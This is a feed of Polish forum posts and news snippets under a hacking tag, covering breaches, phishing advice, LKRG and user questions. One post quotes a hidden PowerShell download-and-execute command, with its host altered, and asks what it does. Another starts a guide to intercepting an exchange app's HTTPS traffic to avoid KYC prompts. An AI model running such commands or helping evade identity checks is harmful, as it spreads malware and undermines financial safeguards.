Wszystko
Najnowsze
Archiwum
- 0
7
Atak hakerski na Polską Agencję Kosmiczną. Zabezpieczyliśmy systemy

Polska Agencja Kosmiczna padła ofiarą ataku hakerskiego. W związku z incydentem zabezpieczone zostały systemy objęte atakiem poinformował Krzysztof Gawkowski, minister cyfryzacji. Służby ustalają sprawcę ataku
z- 2
- #
- #
- #
- #
- #
- 0
Z ciekawosci sobie w authenticatorze sprawdziłem atywność na koncie Microsoft i zauważyłem, że od kilku miesięcy kilka razy dziennie mam podejrzaną aktywność. Próby logowań z różnych miejsc - błędne hasło. Konto zabezpieczone aplikacją + mocne hasło. O co chodzi?
#microsoft #informatyka #hacking #komputery
Mnie dawniej niepokoiły potwierdzenia logowań z jakiś dziwnych geolokalizacji no ale tak to klasyfikuje widocznie logowanie do różnych serwisów powiązanych
- 0
https://bitcoinpl.org/bybit-zhakowane-przez-polnocnokoreanska-grupe-lazarus-najwiekszy-atak-hakerski-w-historii-kryptowalut/
#kryptowaluty #bitcoin #hackingnews #hacking #hakerzy
źródło: image
Pobierz- 0
- 0
5
Jak rozpoznać phishing? Praktyczne porady cyberbezpieczeństwa

Jak sprawdzić, czy podejrzany link lub załącznik w wiadomości są złośliwe? Można to zrobić w kilku prostych krokach, za darmo. Zapraszamy do artykułu otwierającego nasz cykl praktycznych porad cyberbezpieczeństwa dla każdego
z- 2
- #
- #
- #
- #
- #
- #
- 0
#hacking #informatyka #programowanie
- 0
cmd /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\users\public\3aw.msi'; Invoke-RestMethod -Uri 'https://cośtam.short.gy/1' -OutFile $path; Start-Process $path;Adres w kodzie powyżej zmieniłem, żeby nikt się nie naciął. Oczywiście nic nie wklejam, ale jestem ciekaw co to polecenie zrobi.
Pomożecie rozszyfrować?
#hacking #wirus
źródło: Zrzut ekranu 2025-02-10 210023
Pobierz12
Wyciek danych ze strony z przepisami. Na celowniku użytkownicy Thermomiksa

Fakt, że wypłynąć może informacja o dodawaniu pizzy do ananasa, jest najmniejszym problemem w tym przypadku. Wprawdzie Vorwerk zapewnia, że najważniejsza informacja nie wpadła w ręce cyberprzestępców, ale i tak pozyskali cenne dane.
z- 23
- #
- #
- #
- #
- #
15
Polskie projekty IT Security co słychać w LKRG (Linux Runtime Kernel Guard)
Rozmawiamy z Adamem "pi3" Zabrockim oraz Solar Designerem o LKRG (Linux Runtime Kernel Guard), które może znacznie utrudnić zhackowanie Linuxa. Co słychać i jak przebiega rozwój projektu, czy ktoś próbował skutecznie obejść LKRG? Zapraszamy do lektury! :)
z- 4
- #
- #
- #
- #
- #
- #
- 0
Dane miały być opublikowane dzisiaj, na cebulkowej stronie grupy która dopuściła się kradzieży nie widać już wpisu odliczającego do publikacji, publikacji nie ma (a inne dane które miały zostać opublikowane dzisiaj już są do pobrania).
Przestraszyli się skali problemu i tego, że dotyka on raczej wysoko ustawionych w hierarchii społecznej ludzi (nie zwykły Kowalski) i się wycofali, czy #eurocert opłacił haracz?
#
- 2
Zamiast res.set("Content-Type", "application/xml"); musiałem zmienić na res.set("Content-Type", "text/xml");
To technologia z lat 2007
Ale teraz działa <3 Skoro wiem już jak ustawić MIME, ale to też ich wina, nikt w dokumentacji nie napisał, że musi być text/xml!
źródło: 2025-01-24-15-03-37-037
Pobierz- 0
Mój openssh nawet nie chce się połączyć przez ssh z telefonem, bo jest za stary xD
Nawet to nie działa:
Host ciscodevice
Hostname
- 0
Nawet nowy firmware bez pytania oO Jak widać dawniej nie trzymali się bezpieczeństwa xD
@aptitude: Nic się nie zmieniło xd
Ten poradnik pozwala nadal używać wersji aplikacji Kanga Wallet, która nie pyta o KYC. Działa on na Androdzie 6 lub starszym, gdzie nie trzeba rootować telefonu, aby podsłuchać szyfrowaną komunikację HTTPS. Nowszymi wersjami zajmę się później.
1. Instalujemy PCAPdroid
2. Instalujemy PCAPdroid-mitm
3. adb shell
- 1
Czy jeżeli giełda dojdzie do tego, że handlujesz bez KYC, to nie zablokuje ci środków?
@kamil-wasniewski: Dobre pytanie. Zgodnie z oficjalnym stanowiskiem Kangi można legalne handlować bez KYC spoza krajów EOG, czyli możesz połączyć się przez VPN np. z Ukrainy i aplikacja nie powinna zapytać o KYC.
Poradnik dotyczy możliwości dalszego korzystania ze starszej wersji aplikacji (jeśli ktoś nie aktualizuje).
- 0
źródło: image
Pobierz
















#hacking #hakerzy #hakerstwo #cracking #konsole
W jaki sposób działają osoby parające się crackingiem konsol? Z jakiego oprogramowania korzystają do wyszukiwania luk w konsoli? Dlaczego to robią?
〰〰〰〰〰〰〰〰〰〰〰〰〰〰〰
· Akcje: Odpowiedz anonimowo · Więcej szczegółów
https://youtu.be/XuOm-RTQxVU